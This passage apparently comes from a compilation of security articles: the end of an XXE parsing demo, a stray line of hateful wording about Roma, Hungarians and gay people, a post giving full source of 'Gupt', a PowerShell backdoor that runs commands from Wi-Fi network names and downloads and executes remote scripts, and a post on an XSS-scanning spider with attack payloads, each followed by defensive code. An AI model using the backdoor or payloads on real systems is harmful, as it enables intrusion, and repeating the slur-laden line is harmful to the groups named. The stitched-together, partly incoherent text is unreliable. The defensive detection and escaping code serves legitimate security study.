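    # XML requires the literal upper-case keyword, so a byte search is exact.
    if b"<!DOCTYPE" in payload:
        raise DtdNotAllowed("DOCTYPE declarations are not accepted")


def parse_quote(payload, external_entities, allow_dtd=True):
    """Return the GetQuoteResult text; the two flags are the post's two fixes."""
    if not allow_dtd:
        reject_dtd(payload)
    parser = xml.sax.make_parser()
    # Set explicitly so the result does not depend on the interpreter's default.
    parser.setFeature(feature_external_ges, external_entities)
    handler = QuoteHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return "".join(handler.chunks)


def demo():
    """Returns (leaked text, text with external entities off, DTD rejected?)."""
    with tempfile.NamedTemporaryFile("w", suffix=".ini", delete=False) as f:
        f.write("secret=constructed-demo-value\n")   # stand-in for win.ini
        path = f.name
    try:
        payload = soap_payload(path)
        leaked = parse_quote(payload, external_entities=True).strip()
        safe = parse_quote(payload, external_entities=False)
        try:
            parse_quote(payload, external_entities=False, allow_dtd=False)
            rejected = False
        except DtdNotAllowed:
            rejected = True
    finally:
        os.unlink(path)
    return leaked, safe, rejected


if __name__ == "__main__":
    leaked, safe, rejected = demo()
    print("external entities on :", repr(leaked))
    print("external entities off:", repr(safe))
    print("DOCTYPE rejected     :", rejected)
```

Turning off external entity resolution is the minimum; refusing DOCTYPE outright also shuts the door on internal-entity expansion attacks, which is why the pre-check runs before any parsing.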
  21. Penal: He's the terror of the Gypsies, the enemy of the Hungarians and the exterminator of homosexuals.
  22. Introducing Gupt: A Backdoor which uses Wireless network names for command execution
A few weeks back, I was playing with my mobile WiFi hotspot and PowerShell. Using PowerShell, I was listing the SSIDs created by the mobile hotspot, wondering if it could be exploited some way. It turned out to be a yes, but with some help. Behold, I give you Gupt (which means secret), a PowerShell backdoor which could execute commands and scripts on a target if a specially crafted SSID is brought into its proximity. Gupt is very small yet powerful! Like other backdoors, Gupt, a PowerShell script, has to be executed on the target. This could be done using PowerShell Remoting and PsExec (needs credentials of a user or hashes of the built-in Administrator), with an exploit, using client side attacks (I will talk about these at DeepSec), using a Human Interface Device, etc. Previous posts on this blog detail the above methods.

Executing Commands
Gupt checks all wireless network names for a pattern every 5 seconds. It asks for two parameters; the first one, MagicString, is used to identify the SSID which contains commands for it. It needs to be four characters long. For example, if we set MagicString as "op3n", it would compare the SSIDs of all available wireless networks to see if the first four characters of any match "op3n". Gupt needs the network name in a special format. While the first four characters must match MagicString, the 5th character is used to decide if we want it to execute a command or download-and-execute a PowerShell script. If the 5th character is 'c', it means that the rest of the network name is a command! For example, while looking for wireless networks, if Gupt encounters a network with name "op3ncwhoami" it would execute whoami on the target. Simple, isn't it? Let's see it in action. We use the following:
PS C:\nishang> . .\Gupt-Backdoor.ps1
PS C:\nishang> Gupt-Backdoor -MagicString op3n -Verbose
Great! We executed a command on the target without forcing it to connect to the wireless network.
Let's have a look at the attacker's SSID/network name. As we saw, everything after the 'c' is considered a single command. Let's see another example, this time with the PowerShell cmdlet Get-Process. The SSID being "holacget-process". Gupt waits for 10 seconds after executing a command; we can execute more commands by changing the SSID name.

Executing Scripts

Now, how do we execute a script using Gupt? Since the maximum length of an SSID is only 32 characters (with restrictions on special characters), passing scripts in the SSID name is not possible. To achieve script execution, Gupt downloads and executes a script. If the 5th character of the SSID is 'u', Gupt looks for the id part of a URL shortened by the Google URL shortener. For example, an SSID "op3nunJEuug" would use http://goo.gl/nJEuug to download and execute the script. The script would be executed in memory. The second parameter, Arguments, could be used to pass arguments to the downloaded script. Let's see it in action with the Get-Information script from Nishang. We use the following command:

PS C:\nishang> . .\Gupt-Backdoor.ps1
PS C:\nishang> Gupt-Backdoor -MagicString op3n -Argument Get-Information -Verbose

Attacker's SSID being 'op3nunJEuug'. We could also execute the Powerpreter module on a target using Gupt the same way; Powerpreter would provide much wider functionality. Let's see if we could get a meterpreter session with this. We will use the PowerShell script generated using msfpayload. And we have a meterpreter. This is what our SSIDs look like. Cool!

Here is the full source code.

function Gupt-Backdoor
{
    [CmdletBinding()] Param(
        [Parameter(Position=0, Mandatory = $True)]
        [String]
        $MagicString,

        [Parameter(Position=3, Mandatory = $False)]
        [String]
        $Arguments
    )

    #Get list of available Wlan networks
    while($True)
    {
        Write-Verbose "Checking wireless networks for instructions."
        $networks = Invoke-Expression "netsh wlan show network"
        $ssid = $networks | Select-String "SSID"
        $NetworkNames = $ssid -replace ".*:" -replace " "
        ForEach ($network in $NetworkNames)
        {
            #Check if the first four characters of our SSID matches the given MagicString
            if ($network.Substring(0,4) -match $MagicString.Substring(0,4))
            {
                Write-Verbose "Found a network with instructions!"
                #If the network SSID contains fifth character "u", it means rest of the SSID is a URL
                if ($network.Substring(4)[0] -eq "u")
                {
                    Write-Verbose "Downloading the attack script and executing it in memory."
                    $PayloadURL = "http://goo.gl/" + $network.Substring(5)
                    $webclient = New-Object System.Net.WebClient
                    Invoke-Expression $webclient.DownloadString($PayloadURL)
                    if ($Arguments)
                    {
                        Invoke-Expression $Arguments
                    }
                    Start-Sleep -Seconds 10
                }
                elseif ($network.Substring(4)[0] -eq "c")
                {
                    $cmd = $network.Substring(5)
                    if ($cmd -eq "exit")
                    {
                        break
                    }
                    Write-Verbose "Command `"$cmd`" found. Executing it."
                    Invoke-Expression $cmd
                    Start-Sleep -Seconds 10
                }
            }
        }
        Start-Sleep -Seconds 5
    }
}

Gupt waits for 10 seconds after executing a script; we can execute more commands by changing the SSID name. We could force Gupt to exit by naming our network, in the above case, "op3ncexit".

Use cases of Gupt are many, like bypassing network traffic monitoring, backdooring a machine completely on an internal network, or simply showing off something new to the clients. Gupt is available at the github repo of Nishang and would soon be a part of Kautilya too.

If you like this post and are presently in Europe and/or coming to DeepSec, Vienna, join me for interesting hands-on hacks, concepts and code in my two-day training "Powershell for Penetration Testers". Details here: https://deepsec.net/speaker.html#WSLOT145

Hope you enjoyed this. Please leave comments.

Posted by Nikhil SamratAshok Mittal

Source: Lab of a Penetration Tester: Introducing Gupt: A Backdoor which uses Wireless network names for command execution
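The SSID grammar the post describes (four magic characters, then 'c' for a command or 'u' for a goo.gl id) is also what a defender can hunt for in wireless survey output. The following is an added example, not code from the post or from Nishang: it parses a constructed `netsh wlan show network` listing and flags network names shaped like Gupt instructions, exactly when the MagicString is known and heuristically otherwise; the COMMAND_HINTS list and the goo.gl id length check are assumptions made for the heuristic mode.

```python
import re

# Constructed sample of `netsh wlan show network` output; not a real capture.
SAMPLE_NETSH_OUTPUT = """\
Interface name : Wi-Fi
There are 4 networks currently visible.

SSID 1 : HomeNet-5G
    Authentication          : WPA2-Personal

SSID 2 : op3ncwhoami
    Authentication          : Open

SSID 3 : op3nunJEuug
    Authentication          : Open

SSID 4 : Cafe Guest
    Authentication          : Open
"""

SSID_LINE = re.compile(r"^SSID \d+ : (.*)$", re.MULTILINE)
# Command words a Gupt-style 'c' SSID is likely to carry; used only to rate
# hits when no MagicString is known (hunting mode). Assumed list.
COMMAND_HINTS = ("whoami", "get-", "invoke-", "iex", "powershell", "cmd", "net ")

def parse_ssids(netsh_output):
    """Extract visible network names from `netsh wlan show network` output."""
    return [name.strip() for name in SSID_LINE.findall(netsh_output)]

def classify_ssid(ssid, magic=None):
    """Describe a Gupt-shaped SSID (four magic chars, then 'c' = command or
    'u' = goo.gl id, then payload) or return None. Exact with a known magic,
    heuristic without one."""
    if len(ssid) < 6:
        return None
    if magic is not None and ssid[:4] != magic[:4]:
        return None
    mode, payload = ssid[4], ssid[5:]
    if mode == "c":
        if magic is not None or any(h in payload.lower() for h in COMMAND_HINTS):
            return {"ssid": ssid, "type": "command", "payload": payload}
    elif mode == "u":
        # goo.gl ids were short alphanumeric strings; anything else is noise.
        if magic is not None or re.fullmatch(r"[A-Za-z0-9]{5,7}", payload):
            return {"ssid": ssid, "type": "url", "payload": "http://goo.gl/" + payload}
    return None

def find_gupt_ssids(netsh_output, magic=None):
    """Return every visible SSID that matches the Gupt grammar."""
    return [h for h in (classify_ssid(s, magic) for s in parse_ssids(netsh_output)) if h]
```

Run against the sample, the two Gupt-shaped names are reported with their decoded command and download URL while the ordinary SSIDs are ignored.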
  23. XSScrapy: fast, thorough XSS vulnerability spider

Posted on August 20, 2014 by Dan McInerney

https://github.com/DanMcInerney/xsscrapy

Unsatisfied with the current crop of XSS-finding tools, I wrote one myself and am very pleased with the results. I have tested this script against other spidering tools like ZAP, Burp, XSSer, XSSsniper, and others and it has found more vulnerabilities in every case. This tool has scored me dozens of responsible disclosures in major websites including an Alexa Top 10 homepage, major financial institutes, and large security firms' pages. Even the site of the Certified Ethical Hacker certificate progenitors fell victim, although that shouldn't impress you much if you actually know anything about EC-Council. For the record they did not offer me a discounted CEH. Shame, but thankfully this script has rained rewards upon my head like Bush/Cheney on Halliburton; hundreds of dollars, loot, and Halls of Fame in just a few weeks of bug bounty hunting. I think I've had my fill of fun with it so I'd like to publicly release it now. Technically I publicly released it the first day I started on it since it's been on my github the whole time, but judging by the Github traffic graph it's not exactly the Bieber of security tools. Hopefully more people will find some use for it after this article, which will outline its logic, usage, and shortcomings.

Basic usage

Install the prerequisite python libraries, give it a URL, and watch it spider the entire site looking in every nook and cranny for XSS vulnerabilities.

apt-get install python-pip
git clone https://github.com/DanMcInerney/xsscrapy
cd xsscrapy
pip install -r requirements.txt
scrapy crawl xsscrapy -a url="http://example.com"

To login then scrape:

scrapy crawl xsscrapy -a url="http://example.com/login" -a user=my_username -a pw=my_password

All vulnerabilities it finds will be placed in formatted-vulns.txt.
Example output when it finds a vulnerable user agent header:

XSS attack vectors xsscrapy will test
- Referer header (way more common than I thought it would be!)
- User-Agent header
- Cookie header (added 8/24/14)
- Forms, both hidden and explicit
- URL variables
- End of the URL, e.g. www.example.com/<script>alert(1)</script>
- Open redirect XSS, e.g. looking for links where it can inject a value of javascript:prompt(1)

XSS attack vectors xsscrapy will not test
- Other headers: Let me know if you know of other headers you've seen XSS-exploitable in the wild and I may add checks for them in the script.
- Persistent XSS's reflected in pages other than the immediate response page: If you can create something like a calendar event with an XSS in it but you can only trigger it by visiting a specific URL that's different from the immediate response page, then this script will miss it.
- DOM XSS: DOM XSS will go untested.
- CAPTCHA protected forms: This should probably go without saying, but captchas will prevent the script from testing forms that are protected by them.
- AJAX: Because Scrapy is not a browser, it will not render javascript, so if you're scanning a site that's heavily built on AJAX this scraper will not be able to travel to all the available links. I will look into adding this functionality in the future although it is not a simple task.

Test strings

There are few XSS spiders out there, but the ones that do exist tend to just slam the target with hundreds to thousands of different XSS payloads then look for the exact reflection. This is silly. If < and > are filtered then <img src=x onerror=alert(1)> is going to fail just as hard as <script>alert(1)</script>, so I opted for some smart targeting more along the logical lines ZAP uses.

9zqjx

When doing the initial testing for reflection points in the source code this is the string that is used.
It is short, uses a very rare letter combination, and doesn't use any HTML characters, so that lxml can accurately parse the response without missing it.

'"()=<x>

This string is useful as it has every character necessary to execute an XSS payload. The "x" between the angle brackets helps prevent false positives that may occur like in some ASP filters that allow < and > but not if there are any characters between them.

'"(){}[];

Embedded javascript injection. The most important character for executing an XSS payload inside embedded javascript is ' or ", which are necessary to bust out of the variable that you're injecting into. The other characters may be necessary to create functional javascript. This attack path is useful because it doesn't require < or >, which are the most commonly filtered characters.

JaVAscRIPT:prompt(99)

If we find an injection point like <a href="INJECTION"> then we don't need ', ", <, or > because we can just use the payload above to trigger the XSS. We add a few capital letters to bypass poorly written regex filters, use prompt rather than alert because alert is also commonly filtered, and use 99 since it doesn't require quotes, is short, and is not 1, which as you can guess is also filtered regularly.

Logic

Xsscrapy will start by pulling down the list of disallowed URLs from the site's robots.txt file to add to the queue, then start spidering the site, randomly choosing 1 of 6 common user agents. The script is built on top of the web spidering library Scrapy, which in turn is built on the asynchronous Twisted framework, since in Python asynchrony is simpler, speedier and more stable than threading. You can choose the amount of concurrent requests in settings.py; by default it's 12. I also chose to use the lxml library for parsing responses since it's 3-4x as fast as the popular alternative BeautifulSoup.
With every URL the script spiders it will send a second request to the URL with the 9zqjx test string as the Referer header, and a third request to the URL with /9zqjx tacked onto the end of the URL if there are no variables in the URL, in order to see if that's an injection point as well. It will also analyze the original response for a reflection of the user agent in the code. In order to save memory I have also replaced the original hash-lookup duplicate URL filter stock in Scrapy with a bloom filter.

When xsscrapy finds an input vector like a URL variable it will load the value with the test string 9zqjx. Why 9zqjx? Because it has very few hits on Google and is only 5 characters long, so it won't have problems with being too long. The script will analyze the response using lxml+XPaths to figure out if the injection point is in between HTML tags like <title>INJECTION</title>, inside an HTML attribute like <input value="INJECTION">, or inside embedded javascript like var='INJECTION';. Once it's determined where the injection took place it can figure out which characters are going to be the most important and apply the appropriate XSS test string. It will also figure out if the majority of the HTML attributes are enclosed with ' or " and will apply that fact to its final verdict on what may or may not be vulnerable.

Once it's found a reflection point in the code and chosen 1 of the 3 XSS character strings from the section above, it will resend the request with the XSS character string surrounded by 9zqjx, like 9zqjx'"()=<x>9zqjx, then analyze the response from the server. There is a pitfall to this whole method, however. Since we're injecting HTML characters we can't use lxml to analyze the response, so we must use regex instead. Ideally we'd use regex for both preprocessing and postprocessing, but that would require more time and regex skill than I possess. That being said, I have not yet found an example in the wild where I believe this would have made a difference.
Definitely doesn't mean they don't exist.

This script doesn't encode its payloads except for form requests. It will perform one request with the unencoded payload and one request with an HTML entity-encoded payload. This may change later, but for now it seems to me at least 95% of XSS vulnerabilities in top sites lack any filtering at all, making encoding the payload mostly unnecessary.

After the XSS character string is sent and the response processed using regex, xsscrapy will report its finding to the DEBUG output. By default the output of the script is set to DEBUG and will be very verbose. You can change this within xsscrapy/settings.py if you wish. If it doesn't find anything you'll see "WARNING: Dropped: No XSS vulns in http://example.com". It should be noted that redirects are on, which means it will scrape some domains that aren't just part of the original domain you set as the start URL if a domain within the start URL redirects to them. You can disable redirects by uncommenting REDIRECT_ENABLED in xsscrapy/settings.py.

Manually testing reported vulnerabilities

If you see a hit for a vulnerability in a site, you'll need to go manually test it. Tools of the trade: Firefox with the extensions HackBar and Tamper Data. Go to formatted-vulns.txt and check the "Type:" field.
- header: Use Firefox + Tamper Data to edit/create headers and payload the header value.
- url: Just hit the URL with Firefox and change the parameter seen in "Injection point" to a payload.
- form: Use Firefox + HackBar. Enter the value within the "POST url" field of the xsscrapy report into the top half of HackBar, then check the box "Enable Post data" and enter your variable and payload in the bottom box, e.g., var1="><sVG/OnLoaD=prompt(9)>&var2=<sVG/OnLoaD=prompt(9)>
- end of url: Use Firefox, go to the URL listed within the xsscrapy report, and add your payload to the end of the URL like example.com/page1/<sVG/OnLoaD=prompt(9)>

The "Line:" fields are just there to quickly identify if the vulnerability is a false positive and to see if it's an HTTP attribute injection or HTML tag injection.

Recommended payloads:
- Attribute injection: "><sVG/OnLoaD=prompt(9)>
- Between tag injection: <sVG/OnLoaD=prompt(9)>

Future
- I would like the payloaded request URLs to not automatically be URL encoded as they are now. This hasn't been a huge deal so far, but it would be a nice addition. It seems as easy as monkey-patching the Request class and eliminating safe_url_string, but I haven't had success yet.
- Payloads appended to the end of cookies should be added so we can exploit that vector. Done 8/24/14.
- Add ability to scrape AJAX-heavy sites. ScrapingHub has some middleware but still not the simplest task.
- iframe support. Done 8/25/14

Source: XSScrapy: fast, thorough XSS vulnerability spider | Dan McInerney
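The three reflection contexts and the probe strings the post distinguishes (between tags, inside an attribute, inside embedded javascript, plus the javascript: href case) map directly onto the server-side fix. The following is an added example, not code from the post or from xsscrapy: it encodes a reflected value for each context, checks whether any break-out character survives (the same question the tool's regex post-check asks of a response), and rejects the JaVAscRIPT:prompt(99) href vector; the probe values are constructed samples and the BREAKOUT character sets are an assumption of this example.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample reflections in the three contexts the post distinguishes,
# each carrying the probe string xsscrapy would send for that context.
PROBES = {
    "html": "9zqjx'\"()=<x>9zqjx",   # between tags: <title>INJECTION</title>
    "attr": "9zqjx'\"()=<x>9zqjx",   # inside a quoted attribute: value="INJECTION"
    "js":   "9zqjx'\"(){}[];9zqjx",  # inside a JS string literal: var x='INJECTION';
}
# Raw characters that let a value break out of each context if they survive (assumed sets).
BREAKOUT = {"html": "<>", "attr": "'\"<>", "js": "'\"(){}[];<"}

def js_string_escape(value):
    """\\uXXXX-escape everything but ASCII alphanumerics, so the value is inert
    inside a single- or double-quoted JS literal and cannot contain </script>."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp > 0xFFFF:  # astral plane: emit a surrogate pair
            cp -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
        else:
            out.append("\\u%04x" % cp)
    return "".join(out)

def escape_for_context(value, context):
    """Encode a reflected value for the context it lands in (the server-side
    fix for the html/attr/js findings the post describes)."""
    if context in ("html", "attr"):
        return html.escape(value, quote=True)  # & < > " ' become entities
    if context == "js":
        return js_string_escape(value)
    raise ValueError("unknown context: %r" % context)

def breaks_out(encoded, context):
    """True if a raw break-out character survived encoding; this is the same
    question the post's regex post-check asks of the server's response."""
    return any(ch in encoded for ch in BREAKOUT[context])

def safe_href(url):
    """Allow only http(s) and relative links in href/src, returning '#' otherwise.
    The scheme is checked on a lower-cased copy with control chars and whitespace
    stripped, which is what defeats the post's JaVAscRIPT:prompt(99) vector."""
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", url).lower()
    return url if urlsplit(cleaned).scheme in ("http", "https", "") else "#"
```

Each probe breaks out of its context when reflected raw and is inert after escape_for_context; the html/attr encoder deliberately leaves ( ) = untouched because they are harmless once quotes and angle brackets are entities.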